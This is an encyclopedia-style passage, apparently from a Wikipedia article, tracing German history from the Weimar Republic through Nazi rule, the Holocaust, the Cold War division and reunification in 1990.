Under the peace terms of the Treaty of Versailles, Germany's first democracy began its fourteen-year life facing territorial losses, reparations to the victors of World War I and stringent limitations on its military. Political violence from those on the Right who wanted a return to the monarchy and those on the Left who wanted a soviet-style regime repeatedly threatened the moderate socialist government through 1923. Ongoing issues with state finances, impacted by war debt and the funding of striking workers in the Ruhr, fuelled the hyperinflation of 1923 that impoverished many Germans and left them bitter enemies of the Republic. A period of relative political and economic stability that lasted until the onset of the Great Depression in 1929 was followed by the rapid growth of parties on the extremes – the Communists on the Left and the Nazis on the Right – that left the Reichstag (parliament) all but unable to function. In quick succession, four chancellors tried and failed to govern by decree before President Hindenburg named Adolf Hitler chancellor in 1933. In only a few months he had turned the Republic into a Nazi dictatorship.
The Armistice of 11 November 1918 ended the fighting in World War I, and on 28 June 1919 Germany reluctantly signed the peace terms laid out in the Treaty of Versailles. Germany had to renounce sovereignty over its colonies[365] and in Europe lost 65,000 km² (25,000 sq mi), or about 13% of its former territory – including 48% of its iron and 10% of its coal resources – along with 7 million people, or 12% of its population.[366] Allied troops occupied the Rhineland, and it, along with an area stretching 50 kilometres east of the Rhine, was demilitarized.[367] The German army was limited to no more than 100,000 men with 4,000 officers and no general staff; the navy could have at most 15,000 men and 1,500 officers. Germany was prohibited from having an air force, submarines or dreadnoughts. A large number of its ships and all of its air-related armaments were to be surrendered.[368][369] The most contentious article of the treaty, the so-called War Guilt Clause (Article 231), stated that Germany accepted responsibility for the loss and damage from the war caused to the Allies and therefore had to pay reparations for the damage caused to the Allied Powers.[370]
The treaty was reviled as a dictated rather than a negotiated peace. Philipp Scheidemann, the Social Democratic minister president of Germany, said to the Weimar National Assembly on 12 May 1919, "What hand should not wither that puts this fetter on itself and on us?"[371]
The Weimar Constitution established a federal semi-presidential republic with a chancellor dependent on the confidence of the Reichstag (parliament), a strong president who had considerable powers to govern by decree,[372] and a substantial set of individual rights.[373] The Social Democrat Friedrich Ebert was the Republic's first president.
The Left accused the Social Democrats of betraying the ideals of the labour movement because of their alliance with the old elites in the military and administration, while the Right held the supporters of the Republic responsible for Germany's defeat in the war.[374] In early 1920, the right-wing Kapp Putsch, backed by units of the paramilitary Freikorps, briefly took control of the government in Berlin, but the putsch quickly collapsed due to a general strike and passive resistance by civil servants.[375] In the putsch's wake, workers in the industrial Ruhr district, where dissatisfaction with the lack of nationalisation of key industries was particularly high, rose up and attempted to take control of the region. Reichswehr and Freikorps units suppressed the Ruhr uprising with the loss of over 1,000 lives.[376] The unstable political conditions of the period were reflected in the Reichstag election of 1920, in which the centre-left Weimar Coalition, which until then had held a three-quarters majority, lost 125 seats to parties on both the Left and the Right.[377]
Political violence continued at a high level through 1923. A right-wing extremist group assassinated former finance minister Matthias Erzberger in August 1921 and Walther Rathenau, the Jewish foreign minister, in June 1922.[378] 1923 saw the communist-led takeover attempt known as the German October, the right-wing Küstrin Putsch and Adolf Hitler's Beer Hall Putsch.
Germany was the first state to establish diplomatic relations with the new Soviet Union, in the 1922 Treaty of Rapallo.[379] In October 1925, Germany, France, Belgium, Britain and Italy signed the Treaty of Locarno, which recognised Germany's borders with France and Belgium but left its eastern borders open to negotiation. The treaty paved the way for Germany's admission to the League of Nations in 1926.[380]
In May 1921 the Allied Powers set Germany's reparations liability under the terms of the Treaty of Versailles at 132 billion gold marks, to be paid either in gold or commodities such as iron, steel and coal.[381] After a series of German defaults, French and Belgian troops occupied the Ruhr in January 1923. The German government responded with a policy of passive resistance. It underwrote the costs of idled factories and mines and paid the workers who were on strike. Unable to meet the enormous costs by any other means, it resorted to printing money. Along with the debts the state had incurred during the war, this was one of the major causes of the 1923 peak in Germany's post-war hyperinflation.[382] The passive resistance was called off in September 1923, and the occupation ended in August 1925, following an agreement (the Dawes Plan) to restructure Germany's reparations.[383] In November 1923 the government introduced a new currency, the Rentenmark (later the Reichsmark). Together with other measures, it quickly stopped the hyperinflation, but many Germans who lost their life savings became bitter enemies of the Weimar Republic and supporters of the anti-democratic Right.[384] During the following six years the economic situation improved. In 1928 Germany's industrial production surpassed the pre-war level of 1913.[385]
In 1925, following the death in office of President Ebert, the conservative Field Marshal Paul von Hindenburg was elected to replace him. His presidency, coming after a campaign that emphasised nationalism and Hindenburg's ties to the fallen German Empire, marked the beginning of a significant shift to the right in German politics.[386]
The Wall Street crash of 1929 marked the beginning of the worldwide Great Depression, which hit Germany as hard as any nation. In 1931 several major banks failed, and by early 1932 the number of unemployed had soared to more than six million.[387] In the Reichstag election of September 1930, the Communist Party of Germany (KPD) gained 23 seats, while the National Socialist German Workers' Party (NSDAP, Nazi Party), until then a minor far-right party, increased its share by 95 seats, becoming Germany's second largest party behind the Social Democrats.[388] The Nazis were particularly successful among Protestants, unemployed young voters, the lower middle class in the cities and the rural population; they were weakest in Catholic areas and in large cities.[389] The shift to the political extremes made the unstable coalition system by which every Weimar chancellor had governed increasingly unworkable. The last years of the Weimar Republic were marred by even more systemic political instability than previous years, and political violence increased. Four chancellors (Heinrich Brüning, Franz von Papen, Kurt von Schleicher and, from 30 January to 23 March 1933, Adolf Hitler) governed through presidential decree rather than parliamentary consultation.[381] This effectively rendered the Reichstag powerless as a means of enforcing constitutional checks and balances.
Hindenburg was re-elected president in 1932, out-polling Hitler by almost 6 million votes in the second round.[390] The Nazi Party became the largest party in the Reichstag following the election of July 1932. It received 37% of the vote, with the SPD second (22%) and the Communist KPD third at 14%. The Nazis dropped to 33% after another election four months later, but they remained the largest party. The splintered Reichstag was still unable to form a stable coalition. On 30 January 1933, seeing no other viable option and pressured by former chancellor Franz von Papen and other conservatives, President Hindenburg appointed Hitler chancellor.[391]
The Weimar years saw a flowering of German science and high culture, before the Nazi regime brought a decline in the scientific and cultural life of Germany and forced many renowned scientists and writers to flee.
German recipients dominated the Nobel prizes in science.[392] Germany dominated the world of physics before 1933, led by Hermann von Helmholtz, Wilhelm Conrad Röntgen, Albert Einstein, Otto Hahn, Max Planck and Werner Heisenberg. Chemistry likewise was dominated by German professors and researchers at the great chemical companies such as BASF and Bayer, and by figures such as Justus von Liebig, Fritz Haber and Emil Fischer. Theoretical mathematics was advanced by Georg Cantor in the 19th century and David Hilbert in the 20th. Karl Benz, the inventor of the automobile, and Rudolf Diesel were pivotal figures of engineering, as was the rocket engineer Wernher von Braun. Ferdinand Cohn, Robert Koch and Rudolph Virchow were three key figures in microbiology.
Among the most important German writers were Thomas Mann, Hermann Hesse and Bertolt Brecht. The reactionary historian Oswald Spengler wrote The Decline of the West (1918–1923) on the inevitable decay of Western civilization, and influenced intellectuals in Germany such as Martin Heidegger, Max Scheler and the Frankfurt School, as well as intellectuals around the world.[393]
After 1933, Nazi proponents of "Aryan physics", led by the Nobel Prize winners Johannes Stark and Philipp Lenard, attacked Einstein's theory of relativity as a degenerate example of Jewish materialism in the realm of science. Many scientists and humanists emigrated; Einstein moved permanently to the U.S., but some of the others returned after 1945.[394][395]
The Nazi regime suppressed labor unions and strikes, and the prosperity that followed gave the Nazi Party popularity; there were only minor, isolated and ultimately unsuccessful cases of resistance among the German population to its rule. The Gestapo (secret police) destroyed the political opposition and persecuted the Jews, trying to force them into exile. The Party took control of the courts, local government, and all civic organizations except the Christian churches. All expressions of public opinion were controlled by the propaganda ministry, which used film, mass rallies, and Hitler's hypnotic speaking. The Nazi state idolized Hitler as its Führer (leader), putting all powers in his hands. Nazi propaganda centered on Hitler and created the "Hitler Myth": that Hitler was all-wise and that any mistakes or failures by others would be corrected when brought to his attention.[396] In fact Hitler had a narrow range of interests, and decision making was diffused among overlapping, feuding power centers; on some issues he was passive, simply assenting to pressures from whoever had his ear. All top officials reported to Hitler and followed his basic policies, but they had considerable autonomy on a daily basis.[397]
To secure a Reichstag majority for his party, Hitler called for new elections. After the 27 February 1933 Reichstag fire, Hitler swiftly blamed an alleged Communist uprising and convinced President Hindenburg to approve the Reichstag Fire Decree, rescinding civil liberties. Four thousand communists were arrested[398] and Communist agitation was banned. Communists and Socialists were brought into hastily prepared Nazi concentration camps, where they were at the mercy of the Gestapo, the newly established secret police force. Communist Reichstag deputies were taken into "protective custody".
Despite the terror and unprecedented propaganda, the last free general elections, on 5 March 1933, gave the Nazis 43.9% of the vote but failed to deliver their desired majority. Together with the German National People's Party (DNVP), however, Hitler was able to form a slim majority government. On 23 March 1933, the Enabling Act marked the beginning of Nazi Germany,[399] allowing Hitler and his cabinet to enact laws on their own without the President or the Reichstag.[400] The Enabling Act formed the basis for the dictatorship and the dissolution of the Länder. Trade unions and all political parties other than the Nazi Party were suppressed. A centralised totalitarian state was established, no longer based on the liberal Weimar constitution. Germany withdrew from the League of Nations shortly thereafter. The coalition parliament was rigged by defining the absence of arrested and murdered deputies as voluntary and therefore cause for their exclusion as wilful absentees. The Centre Party was voluntarily dissolved in a quid pro quo with the anti-communist Pope Pius XI for the Reichskonkordat; by these manoeuvres Hitler won many Catholic voters over to the Nazi Party and gained long-awaited international diplomatic acceptance of his regime. The Nazis gained a larger share of their vote in Protestant areas than in Catholic areas.[401] The Communist Party was proscribed in April 1933.
Hitler used the SS and Gestapo to purge the entire SA leadership, along with a number of his political adversaries, in the Night of the Long Knives from 30 June to 2 July 1934.[402] As a reward, the SS became an independent organisation under the command of the Reichsführer-SS Heinrich Himmler. Upon Hindenburg's death on 2 August 1934, Hitler's cabinet passed a law proclaiming the presidency to be vacant and transferred the role and powers of the head of state to Hitler.
The Nazi regime was particularly hostile towards Jews, who became the target of unending antisemitic propaganda attacks. The Nazis attempted to convince the German people to view and treat Jews as "subhumans",[403] and immediately after the 1933 federal elections they imposed a nationwide boycott of Jewish businesses. In March 1933 the first Nazi concentration camp was established at Dachau,[404] and from 1933 to 1935 the Nazi regime consolidated its power. The Law for the Restoration of the Professional Civil Service forced all Jewish civil servants to retire from the legal profession and the civil service.[405] The Nuremberg Laws banned sexual relations between Jews and Germans, and only those of German or related blood were eligible to be considered citizens; the remainder were classed as state subjects without citizenship rights.[406] This stripped Jews, Romani and others of their legal rights.[407] Jews continued to suffer persecution under the Nazi regime, exemplified by the Kristallnacht pogrom of 1938, and about half of Germany's 500,000 Jews fled the country before 1939, after which escape became almost impossible.[408]
In 1941, the Nazi leadership decided to implement a plan they called the "Final Solution", which came to be known as the Holocaust. Under the plan, Jews and other "lesser races", along with political opponents from Germany and the occupied countries, were systematically murdered at killing sites and, starting in 1942, at extermination camps.[409] Between 1941 and 1945, Jews, Romani, Slavs, communists, homosexuals, the mentally and physically disabled and members of other groups were targeted and methodically murdered – the origin of the word "genocide". In total, approximately 11 million people were killed during the Holocaust.[410]
In 1935, Hitler officially re-established the Luftwaffe (air force) and reintroduced universal military service, in breach of the Treaty of Versailles; Britain, France and Italy formally protested. Hitler had the officers swear their personal allegiance to him.[411] In 1936, German troops marched into the demilitarised Rhineland.[412] As the territory was part of Germany, the British and French governments did not feel that attempting to enforce the treaty was worth the risk of war.[413] The move strengthened Hitler's standing in Germany. His reputation swelled further with the 1936 Summer Olympics in Berlin, which proved another great propaganda success for the regime, as orchestrated by master propagandist Joseph Goebbels.[414]
Hitler's diplomatic strategy in the 1930s was to make seemingly reasonable demands, threatening war if they were not met. When opponents tried to appease him, he accepted the gains that were offered, then went on to the next target. That aggressive strategy worked as Germany pulled out of the League of Nations, rejected the Versailles Treaty and began to re-arm, won back the Saar, remilitarized the Rhineland, formed an alliance with Mussolini's Italy, sent massive military aid to Franco in the Spanish Civil War, annexed Austria, took over Czechoslovakia after the British and French appeasement at Munich, formed a peace pact with Joseph Stalin's Soviet Union, and finally invaded Poland. Britain and France declared war on Germany, and World War II in Europe began.[415][416]
Having established a "Rome–Berlin axis" with Benito Mussolini and signed the Anti-Comintern Pact with Japan – which Italy joined a year later, in 1937 – Hitler felt able to take the offensive in foreign policy. On 12 March 1938, German troops marched into Austria, where an attempted Nazi coup had been unsuccessful in 1934. When the Austrian-born Hitler entered Vienna, he was greeted by loud cheers, and Austrians voted in favour of the annexation of their country. After Austria, Hitler turned to Czechoslovakia, where the Sudeten German minority was demanding equal rights and self-government. At the Munich Conference of September 1938, Hitler, Mussolini, British Prime Minister Neville Chamberlain and French Prime Minister Édouard Daladier agreed upon the cession of Sudeten territory to the German Reich by Czechoslovakia. Hitler thereupon declared that all of the German Reich's territorial claims had been fulfilled. However, barely six months after the Munich Agreement, Hitler used the smoldering quarrel between Slovaks and Czechs as a pretext for taking over the rest of Czechoslovakia. He then secured the return of Memel from Lithuania to Germany. Chamberlain was forced to acknowledge that his policy of appeasement towards Hitler had failed.
At first Germany was successful in its military operations. In less than three months (April–June 1940), Germany conquered Denmark, Norway, the Low Countries and France. The unexpectedly swift defeat of France resulted in an upswing in Hitler's popularity and an upsurge in war fever.[417][418] Hitler made peace overtures to the new British leader Winston Churchill in July 1940, but Churchill remained dogged in his defiance, with major help from US President Franklin D. Roosevelt. Hitler's bombing campaign against Britain (September 1940 – May 1941) failed. Some 43,000 British civilians were killed and 139,000 wounded in the Blitz; much of London was destroyed. Germany's armed forces invaded the Soviet Union in June 1941 and swept forward until they reached the gates of Moscow. The Einsatzgruppen (Nazi mobile death squads) executed the Soviet Jews they located, while the Germans went to Jewish households and forced the families into concentration camps for labor or to extermination camps for death.
The tide began to turn in December 1941, when the invasion of the Soviet Union met determined resistance in the Battle of Moscow and Hitler declared war on the United States in the wake of the Japanese attack on Pearl Harbor. After the surrender in North Africa and the loss of the Battle of Stalingrad in 1942–1943, the Germans were forced onto the defensive. By late 1944, the United States, Canada, France and Great Britain were closing in on Germany in the West, while the Soviets were victoriously advancing in the East.
In 1944–1945, Soviet forces completely or partially liberated Romania, Bulgaria, Hungary, Yugoslavia, Poland, Czechoslovakia, Austria, Denmark and Norway. Nazi Germany collapsed as Berlin was taken by the Soviet Union's Red Army in a fight to the death on the city streets, in which 2,000,000 Soviet troops faced 750,000 German troops; 78,000–305,000 Soviets were killed, along with 325,000 German civilians and soldiers.[419] Hitler committed suicide on 30 April 1945. The final German Instrument of Surrender was signed on 8 May 1945, marking the end of Nazi Germany.
By September 1945, Nazi Germany and its Axis partners (mainly Italy and Japan) had all been defeated, chiefly by the forces of the Soviet Union, the United States and Britain. Much of Europe lay in ruins, and over 60 million people worldwide had been killed (most of them civilians), including approximately 6 million Jews and 11 million non-Jews in what became known as the Holocaust. World War II destroyed Germany's political and economic infrastructure, caused its partition and considerable loss of territory (especially in the East), and left a historical legacy of guilt and shame.[420]
As a consequence of the defeat of Nazi Germany in 1945 and the onset of the Cold War in 1947, the country's territory was shrunk and split between the two global blocs in the East and West, a period known as the division of Germany. Millions of refugees from Central and Eastern Europe moved west, most of them to West Germany. Two countries emerged: West Germany was a parliamentary democracy, a NATO member, a founding member of what has since become the European Union, one of the world's largest economies, and under Allied military control until 1955,[421] while East Germany was a totalitarian Communist dictatorship controlled by the Soviet Union as a satellite of Moscow. With the collapse of Communism in Europe in 1989, reunification followed.
No one doubted Germany's economic and engineering prowess; the question was how long bitter memories of the war would cause Europeans to distrust Germany, and whether Germany could demonstrate it had rejected totalitarianism and militarism and embraced democracy and human rights.[422]
At the Potsdam Conference, Germany was divided into four military occupation zones by the Allies and did not regain independence until 1949. The provinces east of the Oder and Neisse rivers (the Oder–Neisse line) were transferred to Poland and the Soviet Union (the Kaliningrad Oblast), while the Saarland was separated from Germany to become a French protectorate on 17 December 1947 (it joined West Germany on 1 January 1957), pending a final peace conference with Germany, which never took place.[423] Most of the remaining German population was expelled: around 6.7 million Germans living in "west-shifted" Poland, mostly within previously German lands, and 3 million in German-settled regions of Czechoslovakia were deported west.[424]
The total of German war dead was 8% to 10% of a prewar population of 69,000,000, or between 5.5 million and 7 million people. This included 4.5 million in the military and between 1 and 2 million civilians. There was chaos as 11 million foreign workers and POWs left, while soldiers returned home and more than 14 million displaced German-speaking refugees from the eastern provinces and East-Central and Eastern Europe were expelled from their native lands and came to the western German lands, often foreign to them.[425] During the Cold War, the West German government estimated a death toll of 2.2 million civilians due to the flight and expulsion of Germans and through forced labour in the Soviet Union.[426][427] This figure remained unchallenged until the 1990s, when some historians put the death toll at 500,000–600,000 confirmed deaths.[428] In 2006, the German government reaffirmed its position that 2.0–2.5 million deaths occurred.
Denazification removed, imprisoned, or executed most top officials of the old regime, but most middle and lower ranks of civilian officialdom were not seriously affected. In accordance with the Allied agreement made at the Yalta Conference, millions of POWs were used as forced labor by the Soviet Union and other European countries.[429]
In the East, the Soviets crushed dissent and imposed another police state, often employing ex-Nazis in the dreaded Stasi. The Soviets extracted about 23% of the East German GNP for reparations, while in the West reparations were a minor factor.[430]
In 1945–1946 housing and food conditions were bad, as the disruption of transport, markets, and finances slowed a return to normal. In the West, bombing had destroyed a fourth of the housing stock,[431] and over 10 million refugees from the east had crowded in, most living in camps.[432] Food production in 1946–1948 was only two-thirds of the prewar level, while grain and meat shipments – which had usually supplied 25% of the food – no longer arrived from the East. Furthermore, the end of the war brought the end of large shipments of food seized from occupied nations that had sustained Germany during the war. Coal production was down 60%, which had cascading negative effects on railroads, heavy industry, and heating.[433] Industrial production fell by more than half and reached prewar levels only at the end of 1949.[434]
Allied economic policy originally was one of industrial disarmament plus the building up of the agricultural sector. In the western sectors, most of the industrial plants had minimal bomb damage, and the Allies dismantled 5% of them for reparations.[435]
However, deindustrialization became impractical and the U.S. instead called for a strong industrial base in Germany so it could stimulate European economic recovery.[436]The U.S. shipped food in 1945–1947 and made a $600 million loan in 1947 to rebuild German industry. By May 1946 the removal of machinery had ended, thanks to lobbying by the U.S. Army. The Truman administration finally realised that economic recovery in Europe could not go forward without the reconstruction of the German industrial base on which it had previously been dependent. Washington decided that an "orderly, prosperous Europe requires the economic contributions of a stable and productive Germany".[437][438]
In 1945, the occupying powers took over all newspapers in Germany and purged them of Nazi influence. The American occupation headquarters, the Office of Military Government, United States (OMGUS), began its own newspaper based in Munich, Die Neue Zeitung. It was edited by German and Jewish émigrés who had fled to the United States before the war. Its mission was to encourage democracy by exposing Germans to how American culture operated. The paper was filled with details on American sports, politics, business, Hollywood, and fashions, as well as international affairs.[439]
On 7 October 1949, the Soviet zone became the "Deutsche Demokratische Republik" – "DDR" ("German Democratic Republic" – "GDR", often simply "East Germany"), under the control of the Socialist Unity Party. Neither country had a significant army until the 1950s, but East Germany built the Stasi into a powerful secret police that infiltrated every aspect of its society.[440]
East Germany was an Eastern bloc state under the political and military control of the Soviet Union through its occupation forces and the Warsaw Treaty. Political power was exercised solely by leading members (the Politburo) of the communist-controlled Socialist Unity Party (SED). A Soviet-style command economy was set up; later the GDR became the most advanced Comecon state. While East German propaganda was based on the benefits of the GDR's social programs and the alleged constant threat of a West German invasion, many of its citizens looked to the West for political freedoms and economic prosperity.[441]
Walter Ulbricht was the party boss from 1950 to 1971. In 1933, Ulbricht had fled to Moscow, where he served as a Comintern agent loyal to Stalin. As World War II was ending, Stalin assigned him the job of designing the postwar German system that would centralize all power in the Communist Party. Ulbricht became deputy prime minister in 1949 and secretary (chief executive) of the Socialist Unity (Communist) Party in 1950.[442] Some 2.6 million people had fled East Germany by 1961, when Ulbricht built the Berlin Wall to stop them – shooting those who attempted to cross. What the GDR called the "Anti-Fascist Protective Wall" was a major embarrassment for the regime during the Cold War, but it did stabilize East Germany and postpone its collapse.[443][444] Ulbricht lost power in 1971 but was kept on as a nominal head of state. He was replaced because he had failed to solve growing national crises, such as the worsening economy in 1969–1970, the fear of another popular uprising like that of 1953, and the disgruntlement between Moscow and Berlin caused by Ulbricht's détente policies toward the West.
The transition to Erich Honecker (General Secretary from 1971 to 1989) led to a change in the direction of national policy and to efforts by the Politburo to pay closer attention to the grievances of the proletariat. Honecker's plans were not successful, however, and dissent grew among East Germany's population.
In 1989, the socialist regime collapsed after 40 years, despite its omnipresent secret police, the Stasi. The main reasons for its collapse included severe economic problems and growing emigration towards the West.
East Germany's culture was shaped by Communism and particularly Stalinism. It was characterized by the East German psychoanalyst Hans-Joachim Maaz in 1990 as having produced a "congested feeling" among Germans in the East, a result of Communist policies that criminalized personal expression deviating from government-approved ideals, and of the enforcement of Communist principles by physical force and intellectual repression by government agencies, particularly the Stasi.[445] Critics of the East German state have claimed that the state's commitment to communism was a hollow and cynical tool of a ruling elite. This argument has been challenged by some scholars who claim that the Party was committed to the advance of scientific knowledge, economic development, and social progress. However, the vast majority regarded the state's Communist ideals as nothing more than a deceptive method for government control.[445]
According to the German historian Jürgen Kocka (2010):
On 23 May 1949, the three western occupation zones (American, British, and French) were combined into the Federal Republic of Germany (FRG, West Germany). The government was formed under Chancellor Konrad Adenauer and his conservative CDU/CSU coalition.[447] The CDU/CSU was in power during most of the period since 1949. The capital was Bonn until it was moved to Berlin in 1990. In 1990, the FRG absorbed East Germany and gained full sovereignty over Berlin. At all points West Germany was much larger and richer than East Germany, which became a dictatorship under the control of the Communist Party and was closely monitored by Moscow. Germany, especially Berlin, was a cockpit of the Cold War, with NATO and the Warsaw Pact assembling major military forces in west and east. However, there was never any combat.[448]
West Germany enjoyed prolonged economic growth beginning in the early 1950s (the Wirtschaftswunder or "Economic Miracle").[449] Industrial production doubled from 1950 to 1957, and gross national product grew at a rate of 9 or 10% per year, providing the engine for the economic growth of all of Western Europe. Labor unions supported the new policies with postponed wage increases, minimized strikes, support for technological modernization, and a policy of co-determination (Mitbestimmung), which involved a satisfactory grievance resolution system as well as requiring representation of workers on the boards of large corporations.[450] The recovery was accelerated by the currency reform of June 1948, U.S. gifts of $1.4 billion as part of the Marshall Plan, the breaking down of old trade barriers and traditional practices, and the opening of the global market.[451] West Germany gained legitimacy and respect as it shed the horrible reputation Germany had gained under the Nazis.
West Germany played a central role in the creation of European cooperation; it joined NATO in 1955 and was a founding member of the European Economic Community in 1958.
The most dramatic and successful policy event was the currency reform of 1948.[452] Since the 1930s, prices and wages had been controlled, but money had been plentiful. That meant that people had accumulated large paper assets and that official prices and wages did not reflect reality, as the black market dominated the economy and more than half of all transactions were taking place unofficially. On 21 June 1948, the Western Allies withdrew the old currency and replaced it with the new Deutsche Mark at the rate of 1 new per 10 old. This wiped out 90% of government and private debt, as well as private savings. Prices were decontrolled, and labor unions agreed to accept a 15% wage increase, despite the 25% rise in prices. The result was that the prices of German export products held steady, while profits and earnings from exports soared and were poured back into the economy. The currency reform was simultaneous with the $1.4 billion in Marshall Plan money coming in from the United States, which was used primarily for investment.
In addition, the Marshall Plan forced German companies, as well as those in all of Western Europe, to modernize their business practices and take account of the international market. Marshall Plan funding helped overcome bottlenecks in the surging economy caused by remaining controls (which were removed in 1949), and Marshall Plan business reforms opened up a greatly expanded market for German exports. Overnight, consumer goods appeared in the stores, because they could be sold for realistic prices, emphasizing to Germans that their economy had turned a corner.[432]
The success of the currency reform angered the Soviets, who cut off all road, rail, and canal links between the western zones and West Berlin. This was the Berlin Blockade, which lasted from 24 June 1948 to 12 May 1949. In response, the U.S. and Britain launched an airlift of food and coal and distributed the new currency in West Berlin as well. The city thereby became economically integrated into West Germany.[453] Until the mid-1960s, it served as "America's Berlin", symbolizing the United States' commitment to defending its freedom, which John F. Kennedy underscored during his visit in June 1963.[454]
Konrad Adenauer was the dominant leader in West Germany.[455] He was the first chancellor (top official) of the FRG and, until his death, the founder and leader of the Christian Democratic Union (CDU), a coalition of conservatives, ordoliberals, and adherents of Protestant and Catholic social teaching that dominated West German politics for most of its history. During his chancellorship, the West German economy grew quickly, and West Germany established friendly relations with France, participated in the emerging European Union, established the country's armed forces (the Bundeswehr), and became a pillar of NATO as well as a firm ally of the United States. Adenauer's government also commenced the long process of reconciliation with the Jews and Israel after the Holocaust.[456]
Ludwig Erhard was in charge of economic policy as economics director for the British and American occupation zones and was Adenauer's long-time economics minister. Erhard's decision to lift many price controls in 1948 (despite opposition from both the social democratic opposition and the Allied authorities), plus his advocacy of free markets, helped set the Federal Republic on its strong growth from wartime devastation.[457] Norbert Walter, a former chief economist at Deutsche Bank, argues that "Germany owes its rapid economic advance after World War II to the system of the Social Market Economy, established by Ludwig Erhard."[458][459] Erhard was politically less successful when he served as CDU Chancellor from 1963 until 1966. Erhard followed the concept of a social market economy and was in close touch with professional economists. He viewed the market itself as social and supported only a minimum of welfare legislation. However, Erhard suffered a series of decisive defeats in his effort to create a free, competitive economy in 1957; he had to compromise on such key issues as the anti-cartel legislation. Thereafter, the West German economy evolved into a conventional west European welfare state.[460]
Meanwhile, in adopting the Godesberg Program in 1959, the Social Democratic Party of Germany (SPD) largely abandoned Marxist ideas and embraced the concept of the market economy and the welfare state. It now sought to move beyond its old working-class base to appeal to the full spectrum of potential voters, including the middle class and professionals. Labor unions cooperated increasingly with industry, achieving labor representation on corporate boards and increases in wages and benefits.[461]
In 1966, Erhard lost support and Kurt Kiesinger was elected as Chancellor by a new CDU/CSU-SPD alliance combining the two largest parties. Social Democratic (SPD) leader Willy Brandt was Deputy Federal Chancellor and Foreign Minister. The 1966–1969 Grand Coalition reduced tensions with the Soviet bloc nations and established diplomatic relations with Czechoslovakia, Romania, and Yugoslavia.
With a booming economy short of unskilled workers, especially after the Berlin Wall cut off the steady flow of East Germans, the FRG negotiated migration agreements with Italy (1955), Spain (1960), Greece (1960), and Turkey (1961) that brought in hundreds of thousands of temporary guest workers, called Gastarbeiter. In 1968, the FRG signed a guest worker agreement with Yugoslavia that brought in additional guest workers. Gastarbeiter were young men who were paid full-scale wages and benefits but were expected to return home within a few years.[462]
The agreement with Turkey ended in 1973, but few workers returned because there were few good jobs in Turkey.[463] By 2010 there were about 4 million people of Turkish descent in Germany. The generation born in Germany attended German schools, but many had a poor command of both German and Turkish, and had either low-skilled jobs or were unemployed.[464][465]
Willy Brandt was the leader of the Social Democratic Party from 1964 to 1987 and West German Chancellor from 1969 to 1974. Under his leadership, the German government sought to reduce tensions with the Soviet Union and improve relations with the German Democratic Republic, a policy known as Ostpolitik.[449] Relations between the two German states had been icy at best, with propaganda barrages in each direction. The heavy outflow of talent from East Germany prompted the building of the Berlin Wall in 1961, which worsened Cold War tensions and prevented East Germans from travelling. Although anxious to relieve serious hardships for divided families and to reduce friction, Brandt's Ostpolitik was intent on holding to its concept of "two German states in one German nation".
Ostpolitik was opposed by the conservative elements in Germany, but won Brandt an international reputation and the Nobel Peace Prize in 1971.[466] In September 1973, both West and East Germany were admitted to the United Nations. The two countries exchanged permanent representatives in 1974, and, in 1987, East Germany's leader Erich Honecker paid an official state visit to West Germany.[467]
After 1973, Germany was hard hit by a worldwide economic crisis, soaring oil prices, and stubbornly high unemployment, which jumped from 300,000 in 1973 to 1.1 million in 1975. The Ruhr region was hardest hit, as its easy-to-reach coal mines petered out, and expensive German coal was no longer competitive. Likewise the Ruhr steel industry went into sharp decline, as its prices were undercut by lower-cost suppliers such as Japan. The welfare system provided a safety net for the large number of unemployed workers, and many factories reduced their labor force and began to concentrate on high-profit specialty items. After 1990 the Ruhr moved into service industries and high technology. Cleaning up the heavy air and water pollution became a major industry in its own right. Meanwhile, formerly rural Bavaria became a high-tech center of industry.[435]
A spy scandal forced Brandt to step down as Chancellor while remaining as party leader. He was replaced by Helmut Schmidt (b. 1918), of the SPD, who served as Chancellor in 1974–1982. Schmidt continued the Ostpolitik with less enthusiasm. He had a PhD in economics and was more interested in domestic issues, such as reducing inflation. The debt grew rapidly as he borrowed to cover the cost of the ever more expensive welfare state.[468] After 1979, foreign policy issues grew central as the Cold War turned hot again. The German peace movement mobilized hundreds of thousands of demonstrators to protest against American deployment in Europe of new medium-range ballistic missiles. Schmidt supported the deployment but was opposed by the left wing of the SPD and by Brandt.
The pro-business Free Democratic Party (FDP) had been in coalition with the SPD, but now it changed direction.[469] Led by Economics Minister Otto Graf Lambsdorff, the FDP adopted the market-oriented "Kiel Theses" in 1977; it rejected the Keynesian emphasis on consumer demand and proposed instead to reduce social welfare spending and introduce policies to stimulate production and facilitate jobs. Lambsdorff argued that the result would be economic growth, which would itself solve both the social and the financial problems. As a consequence, the FDP switched allegiance to the CDU, and Schmidt lost his parliamentary majority in 1982. For the only time in West Germany's history, the government fell on a vote of no confidence.[432][470]
Helmut Kohl brought the conservatives back to power with a CDU/CSU-FDP coalition in 1982, and served as Chancellor until 1998.[449] He orchestrated reunification with the approval of all of the Four Powers from World War II, who still had a voice in German affairs.[471] He lost the 1998 election, the left's biggest landslide victory, and was succeeded by the SPD's Gerhard Schröder.[472]
During the summer of 1989, rapid changes known as the peaceful revolution or Die Wende took place in East Germany, which quickly led to German reunification.[449] Growing numbers of East Germans emigrated to West Germany, many via Hungary after Hungary's reformist government opened its borders.
The opening of the Iron Curtain between Austria and Hungary at the Pan-European Picnic in August 1989 then triggered a chain reaction, at the end of which there was no longer a GDR and the Eastern Bloc had disintegrated. The picnic, based on an idea of Otto von Habsburg, produced the greatest mass exodus since the construction of the Berlin Wall and demonstrated that the USSR and the rulers of the Eastern European satellite states were no longer prepared to keep the Iron Curtain sealed. It made their loss of power visible and showed that the GDR could no longer count on effective support from the other communist Eastern Bloc countries.[473][474][475] Thousands of East Germans then tried to reach the West by staging sit-ins at West German diplomatic facilities in other East European capitals, most notably in Prague. The exodus generated demands within East Germany for political change, and mass demonstrations in several cities continued to grow.[476]
Unable to stop the growing civil unrest, Erich Honecker was forced to resign in October, and on 9 November, East German authorities unexpectedly allowed East German citizens to enter West Berlin and West Germany. Hundreds of thousands of people took advantage of the opportunity; new crossing points were opened in the Berlin Wall and along the border with West Germany. This accelerated the process of reform in East Germany, which ended with the dissolution of East Germany and the German reunification that came into force on 3 October 1990.[477]
